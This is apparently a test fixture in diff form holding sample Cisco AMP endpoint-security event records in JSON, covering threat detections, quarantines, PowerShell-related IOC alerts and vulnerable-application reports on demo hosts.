executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 
Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 
Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} 
